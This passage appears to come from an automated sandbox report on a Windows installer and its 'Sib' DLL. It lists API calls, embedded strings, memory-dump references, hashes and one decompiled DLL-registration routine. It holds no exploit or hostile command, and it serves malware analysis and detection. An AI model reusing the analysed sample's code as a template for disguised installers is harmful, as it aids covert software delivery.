                                                                                                                • SysAllocString.OLEAUT32(?), ref: 6FEA9B9A
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 6FEA9BD8
                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 6FEA9C35
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 6FEA9C6A
                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 6FEA9CD4
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 6FEA9D0E
                                                                                                                  • Part of subcall function 6FEA5840: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCONCRTD ref: 6FEA584A
                                                                                                                Strings
                                                                                                                • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp, xrefs: 6FEA9D30
                                                                                                                • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp, xrefs: 6FEA9BE4
                                                                                                                • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp, xrefs: 6FEA9C8A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: String$AllocFree$Base::Concurrency::details::ContextIdentityQueueWork
                                                                                                                • String ID: C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp$C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp$C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp
                                                                                                                • API String ID: 3803223067-4145850606
                                                                                                                • Opcode ID: a1ddc44484a38564774d8f56e8eb22296b0193183b4d84fb0416e7c02cc54fb0
                                                                                                                • Instruction ID: 25fb6ac59aa0a0876f26085c1ea88e9139fb1f01fbd0cba6b1f63d6695cdc053
                                                                                                                • Opcode Fuzzy Hash: a1ddc44484a38564774d8f56e8eb22296b0193183b4d84fb0416e7c02cc54fb0
                                                                                                                • Instruction Fuzzy Hash: D07105B1D10609DFCB04DFA8C994BAEBBB5FF48314F20861CE515AB290D776AA41CB94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FEA3780, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 157memoryfileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _DebugHeapAllocator.LIBCPMTD ref: 6FEA381A
                                                                                                                • _DebugHeapAllocator.LIBCPMTD ref: 6FEA385D
                                                                                                                • _DebugHeapAllocator.LIBCPMTD ref: 6FEA38A9
                                                                                                                • _DebugHeapAllocator.LIBCPMTD ref: 6FEA3937
                                                                                                                • DeleteFileW.KERNEL32(00000000,00000000,00000000,AddActionResult,00000000,00000000,00000000,00000000,00000000,?), ref: 6FEA3945
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AllocatorDebugHeap$DeleteFile
                                                                                                                • String ID: Action failed$AddActionResult$Condition failed$Condition failed
                                                                                                                • API String ID: 1100692808-2694484580
                                                                                                                • Opcode ID: 35748b803d85cb55f39880173c856e90c8be78567da7256d89ff78816d988120
                                                                                                                • Instruction ID: 86972151050deec010b8a3272523e9e617fa1ca20701631273f60eb10a3c2564
                                                                                                                • Opcode Fuzzy Hash: 35748b803d85cb55f39880173c856e90c8be78567da7256d89ff78816d988120
                                                                                                                • Instruction Fuzzy Hash: 8A51EC7591420A9FCB08DF98CDA1ABFBB75BF84208F20451DE5166F2D4DB32A900CB65
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FEF7BE2, Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 373timeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _free$InformationTimeZone
                                                                                                                • String ID: Pacific Daylight Time$Pacific Standard Time
                                                                                                                • API String ID: 597776487-1154798116
                                                                                                                • Opcode ID: 8543d7c13424b4e6eae02c0c521b2f01c1ee186d548cdee7c1d2ef5e9fedd37a
                                                                                                                • Instruction ID: 561a40c6a8fb32f5ab62ac30d21f9ccce4b5a5f99abb1cf89cbf5c8439026bf4
                                                                                                                • Opcode Fuzzy Hash: 8543d7c13424b4e6eae02c0c521b2f01c1ee186d548cdee7c1d2ef5e9fedd37a
                                                                                                                • Instruction Fuzzy Hash: C6C11471A062049BDB10CF78CC41BEA7FB9AF46368F3041AED4949B391E731AA03C750
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FEABF30, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 163memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 6FEABFA9
                                                                                                                  • Part of subcall function 6FEAA6B0: UuidCreate.RPCRT4(?), ref: 6FEAA6F2
                                                                                                                  • Part of subcall function 6FEAA6B0: UuidToStringW.RPCRT4(?,00000000), ref: 6FEAA710
                                                                                                                  • Part of subcall function 6FEAA6B0: RpcStringFreeW.RPCRT4(00000000), ref: 6FEAA735
                                                                                                                  • Part of subcall function 6FEAA6B0: _DebugHeapAllocator.LIBCPMTD ref: 6FEAA74E
                                                                                                                • _DebugHeapAllocator.LIBCPMTD ref: 6FEAC00E
                                                                                                                  • Part of subcall function 6FEA5840: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCONCRTD ref: 6FEA584A
                                                                                                                • _DebugHeapAllocator.LIBCPMTD ref: 6FEAC048
                                                                                                                  • Part of subcall function 6FEA8FD0: _DebugHeapAllocator.LIBCPMTD ref: 6FEA8FDE
                                                                                                                • _DebugHeapAllocator.LIBCPMTD ref: 6FEAC0AB
                                                                                                                • _DebugHeapAllocator.LIBCPMTD ref: 6FEAC0C1
                                                                                                                  • Part of subcall function 6FEAA490: _fwprintf.LIBCONCRTD ref: 6FEAA588
                                                                                                                Strings
                                                                                                                • 1.0.0, xrefs: 6FEAC03D
                                                                                                                • {"productCode": "%s","upgradeCode": "%s"}, xrefs: 6FEAC107
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AllocatorDebugHeap$ProcessorStringUuidVirtual$Base::Concurrency::Concurrency::details::ContextCreateFreeIdentityQueueRootRoot::Work_fwprintf
                                                                                                                • String ID: 1.0.0${"productCode": "%s","upgradeCode": "%s"}
                                                                                                                • API String ID: 1708109837-1423552966
                                                                                                                • Opcode ID: d62f641599f13c45d94c7caf5911c3de32192bc96bebd0df674e249cc0792c52
                                                                                                                • Instruction ID: 9361edb378998360792c56b0cf36dc1dd56d9b15a38b5dd1395ce66677d5ae75
                                                                                                                • Opcode Fuzzy Hash: d62f641599f13c45d94c7caf5911c3de32192bc96bebd0df674e249cc0792c52
                                                                                                                • Instruction Fuzzy Hash: 2471FCB0D05289DFDF04DFA8C994BAEBFB1AF54308F24459CD4156B381DB766A04CBA2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FECF5F0, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 95memorycomthreadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CoInitializeEx.OLE32(00000000,00000000,3A83C854), ref: 6FECF63A
                                                                                                                • CoCreateInstance.OLE32(6FF12830,00000000,00000001,6FF12840, D}), ref: 6FECF69C
                                                                                                                • _DebugHeapAllocator.LIBCPMTD ref: 6FECF7AC
                                                                                                                • ExitThread.KERNEL32 ref: 6FECF7C0
                                                                                                                  • Part of subcall function 6FEA5840: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCONCRTD ref: 6FEA584A
                                                                                                                Strings
                                                                                                                • D}, xrefs: 6FECF689
                                                                                                                • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibuia\Globals.cpp, xrefs: 6FECF649
                                                                                                                • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibuia\Globals.cpp, xrefs: 6FECF6AB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AllocatorBase::Concurrency::details::ContextCreateDebugExitHeapIdentityInitializeInstanceQueueThreadWork
                                                                                                                • String ID: D}$C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibuia\Globals.cpp$C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibuia\Globals.cpp
                                                                                                                • API String ID: 2386534328-2191691385
                                                                                                                • Opcode ID: 7097c4fb7b930db1b0952d0ead4fffc71b87f97384ffa611bf4e2b06e76d4246
                                                                                                                • Instruction ID: 33a00cdd80b599ebc5339c52503d3334d95dd6c5ef2c400fb81a393fe80276a6
                                                                                                                • Opcode Fuzzy Hash: 7097c4fb7b930db1b0952d0ead4fffc71b87f97384ffa611bf4e2b06e76d4246
                                                                                                                • Instruction Fuzzy Hash: 24313970925248AFDB00DBA9CE55BEEBFB4AF09718F20412DF011B72D0DB761A04CB66
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004023F0, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 51%
                                                                                                                			E004023F0(void* __ebx) {
				void* _t28;

				 *(_t28 - 4) = 1;
				if( *0x47eb98 < __ebx) {
					E00404F9E(0xffffffe7, 0x4100f0);
					_push(L"Error registering DLL: Could not initialize OLE");
					E004062CF();
					goto L2;
				} else {
					__edi = E0040145C(__edx, 0xfffffff0);
					 *((intOrPtr*)(__ebp - 8)) = E0040145C(__edx, 1);
					if( *((intOrPtr*)(__ebp - 0x1c)) == __ebx) {
						L6:
						__eax = LoadLibraryExW(__edi, __ebx, 8); // executed
						 *(__ebp + 8) = __eax;
						if(__eax == __ebx) {
							__eax = E00404F9E(0xfffffff6, 0x4100f0);
							_push(__edi);
							_push(L"Error registering DLL: Could not load %s");
							__eax = E004062CF();
							L2:
						} else {
							goto L7;
						}
					} else {
						__eax = GetModuleHandleW(__edi); // executed
						 *(__ebp + 8) = __eax;
						if(__eax != __ebx) {
							L7:
							__esi = E00406391( *(__ebp + 8),  *((intOrPtr*)(__ebp - 8)));
							if(__esi == __ebx) {
								__eax = E00404F9E(0xfffffff7,  *((intOrPtr*)(__ebp - 8)));
								_push(__edi);
								__eax = E004062CF(L"Error registering DLL: %s not found in %s",  *((intOrPtr*)(__ebp - 8)));
							} else {
								 *(__ebp - 4) = __ebx;
								if( *((intOrPtr*)(__ebp - 0x24)) == __ebx) {
									__eax =  *__esi( *((intOrPtr*)(__ebp - 0xc)), 0x2004, 0x47f000, 0x40c0e0, "`�G"); // executed
									__esp = __esp + 0x14;
								} else {
									__eax = E00401435( *((intOrPtr*)(__ebp - 0x24)));
									if( *__esi() != 0) {
										 *(__ebp - 4) = 1;
									}
								}
							}
							if( *((intOrPtr*)(__ebp - 0x20)) == __ebx && E00403CE4( *(__ebp + 8)) != 0) {
								__eax = FreeLibrary( *(__ebp + 8));
							}
						} else {
							goto L6;
						}
					}
				}
				 *0x47eb68 =  *0x47eb68 +  *(_t28 - 4);
				return 0;
			}




                                                                                                                0x004023f0
                                                                                                                0x004023fd
                                                                                                                0x004024ec
                                                                                                                0x004024f1
                                                                                                                0x004017a6
                                                                                                                0x00000000
                                                                                                                0x00402403
                                                                                                                0x0040240c
                                                                                                                0x00402413
                                                                                                                0x00402419
                                                                                                                0x00402429
                                                                                                                0x0040242d
                                                                                                                0x00402433
                                                                                                                0x00402438
                                                                                                                0x004024d5
                                                                                                                0x004024da
                                                                                                                0x004024db
                                                                                                                0x00401957
                                                                                                                0x004017ab
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040241b
                                                                                                                0x0040241c
                                                                                                                0x00402422
                                                                                                                0x00402427
                                                                                                                0x0040243e
                                                                                                                0x00402449
                                                                                                                0x0040244d
                                                                                                                0x00402491
                                                                                                                0x00402496
                                                                                                                0x0040249f
                                                                                                                0x0040244f
                                                                                                                0x0040244f
                                                                                                                0x00402455
                                                                                                                0x00402485
                                                                                                                0x00402487
                                                                                                                0x00402457
                                                                                                                0x0040245a
                                                                                                                0x00402463
                                                                                                                0x00402465
                                                                                                                0x00402465
                                                                                                                0x00402463
                                                                                                                0x00402455
                                                                                                                0x004024aa
                                                                                                                0x004024c3
                                                                                                                0x004024c3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00402427
                                                                                                                0x00402419
                                                                                                                0x004030e6
                                                                                                                0x004030f2

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00425AD2,7519EA30,00000000), ref: 00404FD6
                                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00425AD2,7519EA30,00000000), ref: 00404FE6
                                                                                                                  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5), ref: 00404FF9
                                                                                                                  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory on Reboot("C:\Users\user\AppData\Local\Temp\nsq2FFD.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                Strings
                                                                                                                • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                • `G, xrefs: 0040246E
                                                                                                                • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.467867946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.467855294.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467893180.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467913204.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467974514.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.468002709.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                                • API String ID: 1033533793-4193110038
                                                                                                                • Opcode ID: c076069b8b51cc5180cfdda9fa0df6bded6a99c0ce616e210176aacc9454d606
                                                                                                                • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                                • Opcode Fuzzy Hash: c076069b8b51cc5180cfdda9fa0df6bded6a99c0ce616e210176aacc9454d606
                                                                                                                • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FEA3BD0, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,3A83C854), ref: 6FEA3C5B
                                                                                                                • _DebugHeapAllocator.LIBCPMTD ref: 6FEA3CF3
                                                                                                                  • Part of subcall function 6FEA5840: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCONCRTD ref: 6FEA584A
                                                                                                                Strings
                                                                                                                • %s\%s, xrefs: 6FEA3DE8
                                                                                                                • C:\Users\Operations\Source\Workspaces\Sib\Sibl\SibInstaller\Install.cpp, xrefs: 6FEA3D82
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AllocatorBase::Concurrency::details::ContextDebugFileHeapIdentityModuleNameQueueWork
                                                                                                                • String ID: %s\%s$C:\Users\Operations\Source\Workspaces\Sib\Sibl\SibInstaller\Install.cpp
                                                                                                                • API String ID: 1128770468-521655744
                                                                                                                • Opcode ID: 295f4bd91b0673c8522b84837a34fa81b2c9d66fe2798552980a1d01e3dd41f7
                                                                                                                • Instruction ID: b9e9f8d8752f458997204e22b1fae815a96100e3da9a1e476cfe4a7eaf5464f2
                                                                                                                • Opcode Fuzzy Hash: 295f4bd91b0673c8522b84837a34fa81b2c9d66fe2798552980a1d01e3dd41f7
                                                                                                                • Instruction Fuzzy Hash: 08C11474905228DFCB24DBA4CD98BE9BBB5AF58304F2082DDE4096B290DB756F85CF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FEA9940, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 174memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 6FEA9A16
                                                                                                                • SysFreeString.OLEAUT32(?), ref: 6FEA9A38
                                                                                                                  • Part of subcall function 6FEA5840: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCONCRTD ref: 6FEA584A
                                                                                                                Strings
                                                                                                                • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp, xrefs: 6FEA9A52
                                                                                                                • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp, xrefs: 6FEA9B02
                                                                                                                • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp, xrefs: 6FEA99C4
                                                                                                                • sibjs, xrefs: 6FEA9AA2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: String$AllocBase::Concurrency::details::ContextFreeIdentityQueueWork
                                                                                                                • String ID: C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp$C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp$C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp$sibjs
                                                                                                                • API String ID: 2894111969-246635303
                                                                                                                • Opcode ID: db628a048ba17317ddbed6a22c40a51ed6638d8cfe85f010fee7a007a89c2b02
                                                                                                                • Instruction ID: c142378ba4be8755b41234c8e0427dd3b125390cf4553d581e5005a498bf5ed5
                                                                                                                • Opcode Fuzzy Hash: db628a048ba17317ddbed6a22c40a51ed6638d8cfe85f010fee7a007a89c2b02
                                                                                                                • Instruction Fuzzy Hash: 2C71C4B4E00209DFCB04DF98C994AAEBBB5FF48314F208659E515AB390DB75AD41CBA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FEF7DBD, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 171timeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6FF0BAA0), ref: 6FEF7E27
                                                                                                                • _free.LIBCMT ref: 6FEF7E15
                                                                                                                  • Part of subcall function 6FEF391E: RtlFreeHeap.NTDLL(00000000,00000000,?,6FEFB527,?,00000000,?,?,?,6FEFB54E,?,00000007,?,?,6FEF9B53,?), ref: 6FEF3934
                                                                                                                  • Part of subcall function 6FEF391E: GetLastError.KERNEL32(?,?,6FEFB527,?,00000000,?,?,?,6FEFB54E,?,00000007,?,?,6FEF9B53,?,?), ref: 6FEF3946
                                                                                                                • _free.LIBCMT ref: 6FEF7FE1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _free$ErrorFreeHeapInformationLastTimeZone
                                                                                                                • String ID: Pacific Daylight Time$Pacific Standard Time
                                                                                                                • API String ID: 2155170405-1154798116
                                                                                                                • Opcode ID: c199ba3d6982b90336851c9897212351463f1f8aaa951433f28f2b362e8d42a7
                                                                                                                • Instruction ID: e46a79d4b6f4d25d19865af23181d7194c1fa3f95a3b6378a296745051949f44
                                                                                                                • Opcode Fuzzy Hash: c199ba3d6982b90336851c9897212351463f1f8aaa951433f28f2b362e8d42a7
                                                                                                                • Instruction Fuzzy Hash: C151C472905215ABCB10DF78CC8199A7FBCAF41368B3106AFD521E72E0E7309E42CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FECF9F0, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 106memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 6FEA8FF0: _DebugHeapAllocator.LIBCPMTD ref: 6FEA9045
                                                                                                                • _DebugHeapAllocator.LIBCPMTD ref: 6FECFA2D
                                                                                                                  • Part of subcall function 6FEA8FD0: _DebugHeapAllocator.LIBCPMTD ref: 6FEA8FDE
                                                                                                                  • Part of subcall function 6FEA5840: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCONCRTD ref: 6FEA584A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AllocatorDebugHeap$Base::Concurrency::details::ContextIdentityQueueWork
                                                                                                                • String ID: 8O{$in_
                                                                                                                • API String ID: 1698587239-504405926
                                                                                                                • Opcode ID: c9255ad4843a9ba4fde4679fd7f102f7865c30ad3d6847e8b811928f3b903f06
                                                                                                                • Instruction ID: 2754a95ab2c6d1ccdf625262d5ba50ad9d7df59631e87bd285733cd5a05adf01
                                                                                                                • Opcode Fuzzy Hash: c9255ad4843a9ba4fde4679fd7f102f7865c30ad3d6847e8b811928f3b903f06
                                                                                                                • Instruction Fuzzy Hash: 3941C370914349ABCB04DFA4CE41BAE7F70BB05328F60022EF4206A2E4DB756954CB77
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FEB13E0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 94memoryfileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 6FEE0E77: GetTempPathW.KERNEL32(00000104,?), ref: 6FEE0EA0
                                                                                                                  • Part of subcall function 6FEE0E77: GetTempFileNameW.KERNEL32(?,00000104,00000000,?), ref: 6FEE0EBF
                                                                                                                  • Part of subcall function 6FEE0E77: GetLastError.KERNEL32 ref: 6FEE0EC9
                                                                                                                • DeleteFileW.KERNEL32(00000000,000000FF,sib,00000000,00000104,00000104,3A83C854), ref: 6FEB1494
                                                                                                                • _DebugHeapAllocator.LIBCPMTD ref: 6FEB14FA
                                                                                                                  • Part of subcall function 6FEA5840: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCONCRTD ref: 6FEA584A
                                                                                                                Strings
                                                                                                                • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\EnvTools.cpp, xrefs: 6FEB14B3
                                                                                                                • sib, xrefs: 6FEB142E
                                                                                                                • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\EnvTools.cpp, xrefs: 6FEB144B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
